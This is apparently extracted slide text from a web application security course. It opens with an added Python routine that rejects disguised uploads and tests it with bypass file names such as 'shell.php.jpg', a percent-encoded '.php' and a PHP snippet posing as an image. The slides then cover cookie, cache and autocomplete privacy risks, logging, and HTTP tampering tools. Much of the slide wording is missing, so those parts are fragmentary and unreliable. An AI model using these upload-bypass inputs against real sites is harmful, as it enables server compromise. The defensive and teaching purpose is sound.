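The double-extension, percent-encoding and case tricks listed above, handled in one added Python example that is not from the original slides: the client file name is decoded, reduced to its last path component, required to have exactly one extension from an allowlist, and the leading bytes of the content are checked against the claimed image type before the file is stored under a server-generated name. The allowlist, the magic-byte table and the sample contents are the example's own constructions.

```python
import re
import secrets
from urllib.parse import unquote

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Leading bytes of the permitted image formats (constructed table for this example).
MAGIC = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
STEM_RE = re.compile(r"[a-z0-9_-]{1,64}")


def validate_upload_name(raw_name):
    """Return the lower-case extension if the client file name is acceptable, else None."""
    name = unquote(unquote(raw_name))          # undo %2E%70%68%70-style encoding
    if "\x00" in name:                         # NUL would truncate the name in C APIs
        return None
    name = name.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path component
    parts = name.lower().split(".")            # .pHp and .PHP compare equal to .php
    if len(parts) != 2:                        # no extension, or .php.jpg / .gif.php
        return None
    stem, ext = parts
    if not STEM_RE.fullmatch(stem) or ext not in ALLOWED_EXT:
        return None
    return ext


def content_matches(ext, data):
    """Check the file's leading bytes against the claimed image type."""
    return data.startswith(MAGIC[ext])


def stored_name(ext):
    """Server-chosen name: the client's stem never appears on disk."""
    return secrets.token_hex(16) + "." + ext


def accept_upload(raw_name, data):
    """Name of the stored file, or None if the upload is rejected."""
    ext = validate_upload_name(raw_name)
    if ext is None or not content_matches(ext, data):
        return None
    return stored_name(ext)


if __name__ == "__main__":
    png_bytes = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16    # constructed PNG header
    for name in ("photo.JPG", "shell.php.jpg", "x.gif.php", "a%2E%70%68%70", "a.pHp"):
        print(name, "->", validate_upload_name(name))
    print(accept_upload("pic.png", png_bytes))
    print(accept_upload("pic.png", b"<?php echo 1; ?>"))
```

Renaming on the server also defeats the `.htaccess` and `AddHandler` tricks from the slide, since the stored extension is one the server is configured to serve as a static file and never one it hands to the PHP handler.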
Attack Local Privacy
Attack Local Privacy
              "        "
     Persistent Cookies
      –     Set-Cookie          expires       (          )
          Set-Cookie : UID=d475;expires=Wed, 10-Oct-09 16:08:30GMT
     Cached Web Content
      – Non-SSL Response                             cache
      – IE      Registry

Attack Local Privacy (cont.)
      Browsing History
       – http://rad.msn.com/ADSAdClient31.dll?GetAd=&PG=IMSTWN&AP=1007
       –
      Auto-complete
       – IE :        Registry
       – Firefox :

  Set-Cookie                 expires
                       ,               replay attack
                            cache
Response Header :
 Expires: 0
 Cache-control: no-cache
 Pragma: no-cache
                       URL
POST + SSL
                           auto-complete
 : <input name="password" type="password" id="i0118" maxlength="16" autocomplete="off" value="" />
Log   Audit & Notification
                     : 3A
             Authentication
               (        )
Authorization                     Audit
(            )                (           )

Log
                        :
           (       )/
                   (        )
                                Special for
               /
      ….
Log / Audit
                         Log
      –
      –
                 Log
                Log       / SOC(Security Operation Center)
      –
      –
Notification
               (             )
               out-of-band
      Email/
         /
HTTP
 Browser Extensions
 Web Proxy
                      DOS

HTTP
  Browser Extensions – IE
    TamperIE
       – http://www.bayden.com/Other/
       –
       –         Javascript
    HTTPWatch
       – http://www.httpwatch.com/
       –      IE         Request      Response
       –
    HTTP Analyzer
       – http://www.ieinspector.com/httpanalyzer/
       –       HTTPWatch
       – Standalone
TamperIE
HTTPWatch(Commercial)
HTTP                              (cont.)
  Browser Extensions – Firefox
    Tamper Data
       – https://addons.mozilla.org/firefox/966/
    Add N Edit Cookies
       – https://addons.mozilla.org/firefox/573/
    Live HTTP Headers
       – https://livehttpheaders.mozdev.org/
    HttpFox
       – https://addons.mozilla.org/firefox/addon/6647
    RefControl
       – https://addons.mozilla.org/firefox/addon/953
    HackBar
       – https://addons.mozilla.org/firefox/addon/3899
Tamper Data
Add N Edit Cookies
HttpFox
HackBar
HTTP                                     (cont.)
  Web Proxy
   Burp Suite
       – http://portswigger.net/suite/
   Paros
       – http://www.parosproxy.org/
   Odysseus
       – http://www.bindshell.net/tools/odysseus
   Fiddler
       – http://www.fiddlertool.com/fiddler/
   WebScarab
       – http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
   SPIKE Proxy
       – http://www.immunitysec.com/resources-freesoftware.shtml
   Achilles
       – http://www.mavensecurity.com/achilles
Burp Suite
Paros (   Free Web Scan)
                      (Commercial)
HP DevInspect
  https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-201-200%5E9564_4000_100__
Parasoft
  http://www.parasoft.com/jsp/home.jsp
Fortify 360 SCA(Source Code Analyzer)
  http://www.gss.com.tw/tw/IT-tools/Fortify-SCA.htm
  http://www.fortify.com/products/detect/in_development.jsp;jsessionid=FE6FC1EFD16D72EF59191714521AB1E9
Klocwork
  http://www.klocwork.com/products/?_kk=code%20review%20tool&_kt=f237adfe-c22e-44ff-af59-0a79f6d8abc7&gclid=CLf-uNXJn5wCFQkwpAodA2J_cw
IBM
  http://www-01.ibm.com/software/rational/products/appscan/source/
           -CodeSecure
  http://www.armorize.com/?link_id=codesecure
             (Commercial)
Fortify 360 SCA(Source Code Analyzer)
     (Commercial)
-CodeSecure
                         (Commercial)
Acunetix
  http://www.acunetix.com/
HP WebInspect
  https://h10078.www1.hp.com/cda/hpms/display/main/hpms_content.jsp?zn=bto&cp=1-11-201-200%5E9570_4000_100__
IBM Rational AppScan
  http://www-01.ibm.com/software/awdtools/appscan/
           (Commercial)
Acunetix
                (Commercial)
HP WebInspect
                (Commercial)
IBM Rational AppScan (     )
                       (Free)
ab (Apache Benchmark)
  http://httpd.apache.org/
JMeter
  http://jakarta.apache.org/jmeter/
Microsoft Web Application Stress Tool
  http://www.microsoft.com/technet/archive/itsolutions/intranet/downloads/webstres.mspx
Microsoft Application Center Test
  http://msdn2.microsoft.com/en-us/library/aa287410(VS.71).aspx
…. Many tools
  http://www.softwareqatest.com/qatweb1.html
                          (Commercial)
HP Mercury LoadRunner
  http://www.mercury.com/us/products/performance-center/loadrunner/
IBM Rational Performance Tester
  http://www-306.ibm.com/software/awdtools/tester/performance/index.html
Compuware QALoad
  http://www.compuware.com/products/qacenter/qaload.htm
Radview WebLOAD
  http://www.radview.com/product/description-overview.aspx
Borland SilkPerformer
  http://www.borland.com/us/products/silk/silkperformer/index.html
Empirix Web Applications Testing and Monitoring Solutions
  http://www.empirix.com/products-services/web_applications.asp
     :                              ?
            Confidentiality
               (      )
Integrity                     Availability
 (      )                      (       )

               Security Risk         Secure Coding    Dynamic   Continuous
               Analysis                               Testing   Defense
                                                                & Monitoring
Security                       Security      Code
Requirements                   Design        Review

USD 100   USD 5 for 95% savings in development

code review
RFP

A chain is only as strong as its weakest link !

Trade-Off
                  Convenient
 Performance
                               Security
           Cost
                       Administration
    :   HTTP Essentials    - Stephen Thomas
   : Writing Secure Code 2nd Edition     - Michael Howard David LeBlanc
    : The Web Application Hackers Handbook       - Dafydd Stuttard Marcus Pinto
    : Hacking the Code (ASP.NET Web Application Security) - Mark M. Burnett James C. Foster
        : http://en.wikipedia.org

OWASP
   Top Ten Project
   http://www.owasp.org/index.php/OWASP_Top_Ten_Project
   Guide Project
   http://www.owasp.org.tw/index.php/Category:OWASP_Guide_Project
   ESAPI Project
   http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API#tab=About
IBM Demo Site :
  http://www.testfire.net/
The Cross Site Scripting (XSS)
  http://xssed.com/
The Cross Site Scripting (XSS) FAQ
  http://www.cgisecurity.com/articles/xss-faq.shtml
DOM Based XSS
    http://www.webappsec.org/projects/articles/071105.html
 SQL Injection (              )–          SQL              :
    http://www.microsoft.com/taiwan/sql/SQL_Injection_G1.htm
    http://www.microsoft.com/taiwan/sql/SQL_Injection_G2.htm
 Java EE – use strongly typed PreparedStatement, or
 ORMs such as Hibernate or Spring
    J2EE Prepared Statements:
    http://java.sun.com/docs/books/tutorial/jdbc/basics/prepared.html
.NET – use strongly typed parameterized queries, such
as SqlCommand with SqlParameter or an ORM like
Hibernate
    How to: Protect from SQL injection in ASP.Net
    http://msdn2.microsoft.com/en-us/library/ms998271.aspx
 "How CAPTCHA got trashed"
    http://www.computerworld.com/s/article/9104619/How_CAPTCHA_got_trashed
 CAPTCHA Decoder
    http://caca.zoy.org/wiki/PWNtcha
"Why File Upload Forms are a major security threat"
    http://www.acunetix.com/websitesecurity/upload-forms-threat.htm
HTTP Response Splitting
    http://download.boulder.ibm.com/ibmdl/pub/software/dw/richmedia/rational/08/appscan_demos/httpresponsesplitting/viewer.swf#recorded_advisory
 "2009 CWE/SANS Top 25 Most Dangerous Programming Errors"
    http://cwe.mitre.org/top25/index.html